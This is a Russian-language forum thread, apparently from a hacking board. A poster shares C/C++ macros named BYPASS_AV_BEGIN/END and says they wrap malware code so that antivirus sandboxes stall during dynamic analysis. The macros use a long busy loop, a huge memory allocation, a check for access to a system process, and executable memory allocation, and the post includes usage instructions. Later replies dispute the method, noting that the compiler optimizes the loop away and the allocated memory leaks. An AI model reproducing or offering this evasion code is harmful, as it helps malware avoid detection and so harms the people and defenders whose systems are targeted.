#define BYPASS_AV_BEGIN char* memdmp = NULL;memdmp = (char*)malloc(100000000);if (memdmp != NULL){int cpt = 0;for (int i = 0; i < 100000000; i++){cpt++;}if (cpt == 100000000){HANDLE file;HANDLE proc;proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 4);if (proc == NULL){LPVOID mem = NULL;mem = VirtualAllocExNuma(GetCurrentProcess(), NULL, 100, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE, 0);if (mem != NULL){DWORD result = FlsAlloc(NULL);if (result != FLS_OUT_OF_INDEXES){ Код #define BYPASS_AV_BEGIN char* memdmp = NULL;memdmp = (char*)malloc(100000000);if (memdmp != NULL){int cpt = 0;for (int i = 0; i < 100000000; i++){cpt++;}if (cpt == 100000000){HANDLE file;HANDLE proc;proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 4);if (proc == NULL){LPVOID mem = NULL;mem = VirtualAllocExNuma(GetCurrentProcess(), NULL, 100, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE, 0);if (mem != NULL){DWORD result = FlsAlloc(NULL);if (result != FLS_OUT_OF_INDEXES){ #define BYPASS_AV_END }}}}} Код #define BYPASS_AV_END }}}}} Вставляем дефайны в заголовок исходника и используем! Пример: int main() { BYPASS_AV_BEGIN //malware code... BYPASS_AV_END } Код int main() { BYPASS_AV_BEGIN //malware code... BYPASS_AV_END } Прикол в том что динамическим анализом антивири умрут на моменте BYPASS_AV_BEGIN из-за for (int i = 0; i < 100000000; i++) и манипуляциями с выделением памяти в процессе. На деле задержек из-за цикла не будет ибо это простая инструкция для процессора и на оборот для санбокса антивиря.
1mNotS0rr1, проверь? я этот код проверял и сам использовал пока не ушёл с плюсов --- Сообщение объединено с предыдущим 6 дек 2019 1mNotS0rr1, Я никому ничего не должен, я выкладываю свой код в котором уверен, и да, если бы ты знал хотябы основы C++, то понял что логика антивирусных санбоксов проста. А именно эти санбоксы трассируют все колы в программе но из-за того что это C++ а не шарп она может выборочно трассировать -- значит она с функции main пробегает по каждому колу пока не остановится на экзепшине и начинаем по новой пока не закончит. НО мой код представляет из себя капкан для трассировки и каждый раз она останавливается в этом месте. Ясен хуй что время у неё ограничено и ресурсы тоже так что до посинения она не будет трассировать это дерьмо чтобы выбраться из капкана.
Aendy, на самом деле все инфа по этому давно есть в паблике на ру сфере и рохитабе, я просто собрал всё воедино)
Опять это аниме пытается свои вирусы распостронить, будто нам вашего корона вируса мало кетайци праклятые.
Fender_inactive2697143, не нравится что-то в некст раз не высирай тут своё мнение а создай такую же тему.
0xEMPEROR, я не высрал, я дал вполне хорошие рекомендации. Разве ты не хочешь, чтобы твой код становился лучше?
Хмм, очень интересно, особенно если бы ТС объяснил какого лешего это вообще должно иметь шанс быть работоспособным, если int cpt = 0; for (int i = 0; i < 100000000; i++) { cpt++; } if (cpt == 100000000) { } C int cpt = 0; for (int i = 0; i < 100000000; i++) { cpt++; } if (cpt == 100000000) { } Вот эта часть кода вообще оптимизируется компилятором со всеми флагами А выделенная в начале память вообще утекает. memdmp = (char*)malloc(100000000); C memdmp = (char*)malloc(100000000); Почему нельзя оформить всё как нормальный человек и не лепить всё в define ?